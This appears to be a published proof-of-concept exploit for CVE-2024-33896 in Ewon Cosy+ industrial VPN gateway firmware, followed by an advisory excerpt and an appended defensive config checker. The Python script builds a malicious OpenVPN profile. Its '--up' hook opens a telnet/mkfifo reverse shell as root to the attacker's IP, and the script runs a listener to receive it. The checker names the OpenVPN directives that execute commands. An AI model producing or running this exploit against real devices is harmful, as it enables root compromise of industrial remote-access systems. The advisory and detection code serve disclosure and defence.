```python
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896

import socket
import threading
import time


def create_malicious_openvpn_config(file_path, attacker_ip):
    # The uploaded profile abuses the OpenVPN "up" hook, which the device runs
    # as root, together with "script-security 2", which permits user scripts.
    with open(file_path, 'w') as f:
        f.write(f"""
client
dev tun
persist-tun
proto tcp
verb 5
mute 20
--up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"'
script-security 2
""")


def start_listener(port):
    # Plain TCP listener that prints whatever the callback sends.
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('0.0.0.0', port))
    server_socket.listen(1)
    print(f" - --> Listening_0n_port {port}")
    client_socket, _ = server_socket.accept()
    print(" - --> Received")
    while True:
        data = client_socket.recv(1024)
        if not data:
            break
        print(data.decode())
    client_socket.close()
    server_socket.close()


if __name__ == "__main__":
    IP = '127.0.0.1'
    config = '/path/to/malicious_config.ovpn'
    port = 5000
    # Run the listener in a background thread; the original re-imported this
    # file as "main" in a subprocess, which only worked if it was saved as main.py.
    listener_thread = threading.Thread(target=start_listener, args=(port,), daemon=True)
    listener_thread.start()
    time.sleep(2)
    create_malicious_openvpn_config(config, IP)
    print(f" - --> config_created {config}")
    listener_thread.join()
```

GitHub: https://github.com/codeb0ss/CVE-2024-33896-PoC

Hey,

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!"

Due to improper neutralization of parameters read from a user-controlled configuration file, an authenticated attacker is able to inject and execute OS commands on the device.
Vulnerability Details:

Authenticated attackers are able to upload a custom OpenVPN configuration. This configuration can contain the OpenVPN parameters "--up" and "--down", which execute a specified script or executable. Since the OpenVPN process itself runs with the highest privileges (root), this allows the device to be completely compromised.
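A defender-side check for the root cause described above, added here as an example that is not part of the PoC or the advisory: it scans an uploaded OpenVPN profile for directives that make the daemon execute external commands, which is what the device should have done before handing the file to a root OpenVPN process. The `up` and `down` hooks are the ones named in the advisory; the other directive names are further standard OpenVPN script hooks that the page does not mention, and the sample profile is constructed for the demonstration.

```python
# OpenVPN directives that cause the daemon to run an external command or load
# code. "up" and "down" are the hooks abused in CVE-2024-33896; the remaining
# names are other OpenVPN script/plugin hooks with the same effect.
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange",
    "client-connect", "client-disconnect", "learn-address",
    "auth-user-pass-verify", "tls-verify", "plugin",
}


def check_openvpn_config(text):
    """Return (line_no, directive, line) for every config line that would make
    OpenVPN execute something, plus any script-security level of 2 or higher."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank line or comment
        # OpenVPN accepts the command-line style "--" prefix inside config
        # files too (the PoC uses "--up"), so strip it before matching.
        token = line.split(None, 1)[0].lstrip("-").lower()
        if token in SCRIPT_DIRECTIVES:
            findings.append((n, token, line))
        elif token == "script-security":
            parts = line.split()
            # Level 2 and above allow user-defined scripts to run.
            if len(parts) > 1 and parts[1].isdigit() and int(parts[1]) >= 2:
                findings.append((n, token, line))
    return findings


def is_config_safe(text):
    """True when the profile contains no command-executing directive."""
    return not check_openvpn_config(text)


# Constructed sample profile shaped like the PoC's; the shell body is elided.
SAMPLE_CONFIG = """\
client
dev tun
persist-tun
proto tcp
verb 5
mute 20
--up '/bin/sh -c "...command body elided..."'
script-security 2
"""

if __name__ == "__main__":
    for line_no, directive, line in check_openvpn_config(SAMPLE_CONFIG):
        print(f"line {line_no}: rejected directive '{directive}': {line}")
```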